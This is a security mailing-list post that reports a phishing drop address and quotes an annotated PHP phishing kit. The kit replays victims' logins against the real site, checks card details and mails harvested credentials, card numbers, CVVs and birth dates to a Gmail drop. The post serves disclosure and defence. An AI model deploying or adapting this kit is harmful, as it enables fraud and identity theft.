[nsp-sec] Google dropbox
Helge Aksdal
helge.aksdal at telenor.com
Mon Feb 11 05:15:25 EST 2013
Hi,
The e-mail address shootermoney87 at gmail.com is used as a dropbox in a phishing
campaign.
| <?php
| $myemail = "shootermoney87 at gmail.com"; //Dir ton email Hna -- (analyst: looks like Darija/French for "put your e-mail here"; this is the drop address that receives the harvested data through mail() at the end of the script)
| error_reporting(1); // analyst: level 1 is E_ERROR only, so warnings and notices raised by the script are not reported
| function doRequest($method, $url, $referer, $agent, $cookie, $vars) { // analyst: cURL wrapper the kit uses to send requests from the hosting server to the impersonated site; returns the response body, or null when curl_exec() gives a falsy result
| $ch=curl_init();
| curl_setopt($ch, CURLOPT_URL, $url);
| if($referer != "") {
| curl_setopt($ch, CURLOPT_REFERER, $referer);
| }
| curl_setopt($ch, CURLOPT_USERAGENT, $agent);
| curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); // redirects are followed
| curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // response body comes back as a string instead of being printed
| curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie); // $cookie is a file path: cookies are written to this on-disk jar ...
| curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie); // ... and read back from the same file on the next request
| if ($method == 'POST') { // loose comparison; any other $method goes out as a GET and $vars is ignored
| curl_setopt($ch, CURLOPT_POST, 1);
| curl_setopt($ch, CURLOPT_POSTFIELDS, $vars);
| }
| if (substr($url, 0, 5) == "https") {
| curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); // peer certificate verification is switched off
| curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 1); // 1 is not the full hostname check (that is 2), so the TLS peer is effectively not validated
| }
|
| $data = curl_exec($ch);
| curl_close($ch);
|
| if ($data) { // false, "" and "0" all fall through here, and the function then returns null implicitly
| return $data;
| }
|
| }
|
| function get($url, $referer, $agent, $cookie) { // analyst: GET helper around doRequest()
| return doRequest('GET', $url, $referer, $agent, $cookie, 'NULL'); // 'NULL' is a string literal, not null; doRequest() only reads $vars on the POST path, so it is never sent
| }
|
| function post($url, $referer, $agent, $cookie, $vars) { // analyst: POST helper around doRequest(); $vars is passed through unchanged as the request body
| return doRequest('POST', $url, $referer, $agent, $cookie, $vars);
| }
|
| parse_str($_SERVER['QUERY_STRING']); // analyst: one-argument form, every query-string parameter becomes a variable in this scope; this is where $cmd comes from (form deprecated in PHP 7.2, removed in PHP 8.0, so the sample needs an older runtime)
| $log="log.php"; // file included for the login step, presumably the fake login form; not part of this post
| $ver="index.php"; // file included for the card-details step, presumably the fake verification form; not part of this post
|
| if($cmd=="log"){ // analyst: "log" step -- the submitted login/password are tested against the real service before the victim is moved on to the card form
| $random=rand(1, 100000);
| $cookie=$random . ".php"; // cookie jar gets a random numeric name with a .php extension, as a relative path in the script's working directory
| $agent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"; // fixed User-Agent on the replayed requests; with the Referer below it is a server-side detection point for the impersonated service
|
| $referrer="http://www.xxxxxx[.]xx"; // target domain redacted by the poster
| $vars="appId=ABONNESNEUF&loginUrl=https%3A%2F%2Fxxxxxx[.]xx%2Fmoncompte-webapp%2Fconnexion%2FloginAction.action&forwardUrl=https%3A%2F%2Fxxxxxx[.]xx%2Fmoncompte-webapp%2Fmoncompte%2FgererOffre%2FgererOffre.action%3FidSso%3D%23%23SSOID%23%23&login=".$_POST['login']."&password=".$_POST['password']."&x=57&y=10"; // victim-supplied login and password are concatenated into the form body without URL-encoding
| $error=0;
| if($_POST['login']==""){
| $error=1;
| }
|
| if($_POST['password']==""){
| $error=1;
| }
| if($error) { // empty login or password: the $log page is shown again and nothing is sent to the real site
| include $log;
| exit();
| }
| $url="http://www.xxxxxx[.]xx";
| $str= get($url, $referrer, $agent, $cookie); // first request; its result is overwritten below, presumably made only to collect session cookies -- TODO confirm
| $url="https://xxxxxx[.]xx";
| $str= post($url, $referrer, $agent, $cookie, $vars); // the login attempt itself, made from the server hosting the kit
| unlink($cookie); // jar file is removed after the two requests, so it exists on disk only briefly
| if(strstr($str, 'Votre Identifiant ou votre mot de passe est incorrect')) { // the site's own French failure message ("your identifier or password is incorrect") marks rejected credentials
| $error=1;
| include $log;
| exit();
| }
|
| $login=$_POST['login']; // credentials are placed in plain variables that the included $ver file can read ...
| $password=$_POST['password']; // ... this file itself does not mail them at this step
| include $ver;
| exit();
| }
|
| if($cmd=="login"){ // analyst: "login" step -- only displays the $log page, no data is processed here
| include $log;
| exit();
| }
|
| if($cmd=="verification") { // analyst: "verification" step -- checks the submitted card form, then mails all fields to the drop addresses and redirects the victim
| $error = 0;
|
| if (!is_numeric($_POST['cvv'])){
| $error = 1;
| $cvvclass="Warning"; // the *class variables are presumably read by the included $ver file to highlight the field -- not visible in this post
| }
|
| if (!is_numeric($_POST['cnum'])){
| $error = 1;
| $cnumclass="Warning";
| }
|
| if (strlen($_POST['dobyear']) != 4){
| $error = 1;
| $dobyearclass="Warning";
| }
| $cc1cvv2 = $_POST['cvv'];
| $a = substr($_POST['cnum'],0,1); // first digit of the card number selects the expected CVV length: "3" needs 4 digits, "4", "5" and "6" need 3
| if($a == "3"){
| if (strlen($cc1cvv2) != 4){
| $error = 1;
| $cvvclass="Warning";
| }
| } elseif($a == "4") {
| if (strlen($cc1cvv2) != 3){
| $error = 1;
| $cvvclass="Warning";
| }
| } elseif($a == "5") {
| if (strlen($cc1cvv2) != 3){
| $error = 1;
| $cvvclass="Warning";
| }
| } elseif($a == "6") {
| if (strlen($cc1cvv2) != 3){
| $error = 1;
| $cvvclass="Warning";
| }
| }
|
| if($_POST['name']==""){ // from here to dobyear the empty-field checks only set a *class variable; none of them sets $error, so they do not block the submission by themselves
| $nameclass="Warning";
| }
| if($_POST['address']==""){
| $addressclass="Warning";
| }
| if($_POST['city']==""){
| $cityclass="Warning";
| }
| if($_POST['zip']==""){
| $zipclass="Warning";
| }
| if($_POST['phone']==""){
| $phoneclass="Warning";
| }
| if($_POST['cmonth']==""){
| $cmonthclass="Warning";
| }
| if($_POST['cyear']==""){
| $cyearclass="Warning";
| }
| if($_POST['dobmonth']==""){
| $dobmonthclass="Warning";
| }
| if($_POST['dobday']==""){
| $dobdayclass="Warning";
| }
| if($_POST['dobyear']==""){
| $dobyearclass="Warning";
| }
| if($error)
| {
| include $ver;
| exit();
| }
|
| $ip = getenv("REMOTE_ADDR"); // victim IP as seen by the hosting server
| $hostname = gethostbyaddr($ip); // reverse lookup is performed but $hostname is not used below
| $message .= "===================================================================\n"; // $message is appended to without being initialised in this file
| $message .= "Full Name : ".$_POST['name']."\n";
| $message .= "Billing Address : ".$_POST['address']."\n";
| $message .= "city : ".$_POST['city']."\n";
| $message .= "zip code : ".$_POST['zip']."\n";
| $message .= "phone : ".$_POST['phone']."\n";
| $message .= "Saisissez les 11 chiffres de votre numÊro de compte : ".$_POST['Salvc']."\n"; // French label: "enter the 11 digits of your account number"
| $message .= "Identifant de la banque : ".$_POST['salton']."\n"; // French label: bank identifier
| $message .= "Card Number : ".$_POST['cnum']."\n";
| $message .= "Expiration : ".$_POST['cmonth']."/".$_POST['cyear']."\n";
| $message .= "Cvv : ".$_POST['cvv']."\n";
| $message .= "Date of Birth : ".$_POST['dobmonth']."/".$_POST['dobday']."/".$_POST['dobyear']."\n";
| $message .= "------ IP ----\n";
| $address = $_POST['address']; // assigned but not used below
| $message .= "IP : $ip\n";
| $timedate = $_POST['historys']; // despite the name this is not a timestamp: the POST field 'historys' is used as a second mail recipient below
| $message .= "===================================================================\n";
| $subject = "[D--K]- ".$_POST['cnum']; // subject carries the card number; the fixed "[D--K]- " prefix is usable as a mail-side indicator
| $headers = "From: |D-K|<>"; // fixed From header with an empty address, a second mail-side indicator
| mail($myemail,$subject,$message,$headers); // copy 1: to the hard-coded drop address
| mail($timedate,$subject,$message,$headers); // copy 2: to whatever address arrived in 'historys' -- presumably a hidden field in the index.php form, worth recovering when the kit is collected
| header("Location: http://www.xxxxxx[.]xx/"); // victim is then sent to the (redacted) real site; no exit() follows the redirect
| }
| ?>
--
Helge Aksdal
Telenor